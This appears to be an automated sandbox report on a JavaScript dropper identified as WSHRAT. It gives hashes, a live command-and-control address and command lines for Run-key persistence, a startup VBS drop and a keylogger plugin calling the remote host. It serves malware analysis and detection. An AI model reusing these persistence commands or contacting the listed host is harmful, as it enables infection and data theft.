Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
17-06-2024 11:10
Static task
static1
Behavioral task
behavioral1
Sample
ORDER-24617-01667859-24.js
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
ORDER-24617-01667859-24.js
Resource
win10v2004-20240611-en
General
-
Target
ORDER-24617-01667859-24.js
-
Size
7KB
-
MD5
f3e6a7eba2bd6ca312768ac1560bad6f
-
SHA1
04a683416a38f3c8acf06b64fd5e598a2902f684
-
SHA256
7a06aaf3103d9dce60c0c4652fd505c7a8df42c826d486be1973008d1c22c838
-
SHA512
4ea84c8c33a0fa6a235f6b5ec620e172a5ea5f4a9f372307ea9e1946d6393326bec448e32cadacb1c444270c973046a09be3c590fb7ae61fcc76999553e03265
-
SSDEEP
48:95jUotZH9ZR0/kdlZK8rflZPos9ZPfBjBZfo5CvA7ehZvKoN69ZLi1t16r1SBZ5B:T0/ZYbukAKdrKBXB1XBdi
Malware Config
Extracted
wshrat
http://jinvestments.duckdns.org:7044
Signatures
-
Blocklisted process makes network request 26 IoCs
flow pid Process 1 2044 wscript.exe 21 3840 wscript.exe 23 3840 wscript.exe 26 3840 wscript.exe 27 3840 wscript.exe 28 3840 wscript.exe 38 3840 wscript.exe 46 3840 wscript.exe 47 3840 wscript.exe 51 3840 wscript.exe 52 3840 wscript.exe 57 3840 wscript.exe 58 3840 wscript.exe 59 3840 wscript.exe 60 3840 wscript.exe 61 3840 wscript.exe 64 3840 wscript.exe 65 3840 wscript.exe 66 3840 wscript.exe 67 3840 wscript.exe 69 3840 wscript.exe 73 3840 wscript.exe 75 3840 wscript.exe 76 3840 wscript.exe 77 3840 wscript.exe 78 3840 wscript.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HTYBQC.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HTYBQC.vbs wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 1084 kl-plugin.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" wscript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 ip-api.com -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
pid Process 1788 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings wscript.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1788 taskkill.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1084 kl-plugin.exe 1084 kl-plugin.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2044 wrote to memory of 4064 2044 wscript.exe 92 PID 2044 wrote to memory of 4064 2044 wscript.exe 92 PID 4064 wrote to memory of 3840 4064 WScript.exe 94 PID 4064 wrote to memory of 3840 4064 WScript.exe 94 PID 3840 wrote to memory of 1320 3840 wscript.exe 96 PID 3840 wrote to memory of 1320 3840 wscript.exe 96 PID 1320 wrote to memory of 1788 1320 cmd.exe 98 PID 1320 wrote to memory of 1788 1320 cmd.exe 98 PID 3840 wrote to memory of 1084 3840 wscript.exe 99 PID 3840 wrote to memory of 1084 3840 wscript.exe 99 PID 3840 wrote to memory of 1084 3840 wscript.exe 99
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ORDER-24617-01667859-24.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HTYBQC.vbs"2⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\HTYBQC.vbs"3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\system32\taskkill.exetaskkill /F /IM kl-plugin.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
-
C:\Users\Admin\AppData\Roaming\kl-plugin.exe"C:\Users\Admin\AppData\Roaming\kl-plugin.exe" jinvestments.duckdns.org 7044 "WSHRAT|5C6941C0|PXHSTPPU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 6/17/2024|Visual Basic-v2.0|GB:United Kingdom" 14⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1084
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4264,i,5229431749694857451,16836185654682871752,262144 --variations-seed-version --mojo-platform-channel-handle=3864 /prefetch:81⤵PID:3380
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
297B
MD5be2ba1a8c142b5fa2178396ac67cb7d8
SHA1b7c3d209d9c95d4b67d7ffb3c777d07f398260a5
SHA2561191fa5928ed7ebf51830c0e601a327fb6480e4f35d9f96962c828b5b45ea260
SHA512cca824422ebcc194e96c6af6c66160409b6c4f9e30af387921ad55712fc4316866e7ac3b2806427f7e06e43e99ef56e612738261f8d38fb58ef2758dc13c9204
-
Filesize
832KB
MD59eb84b410320b27a000a848a1c22b91c
SHA17b84f1301c73993648f0bdf254f1fc202a12aab8
SHA256f44a15168c937d547a57015ccdf034d5f958fa9e9a159e09730b09acb17124dc
SHA5129ab878e70322df08ebe934e18b30d7b151f49a27ca99fafefa77fdd81ef3ed05700671d0e0dc22842355995fd2c5dc39442d60a9559635eda11ca17194d2d203
-
Filesize
25KB
MD57099a939fa30d939ccceb2f0597b19ed
SHA137b644ef5722709cd9024a372db4590916381976
SHA256272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a
SHA5126e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721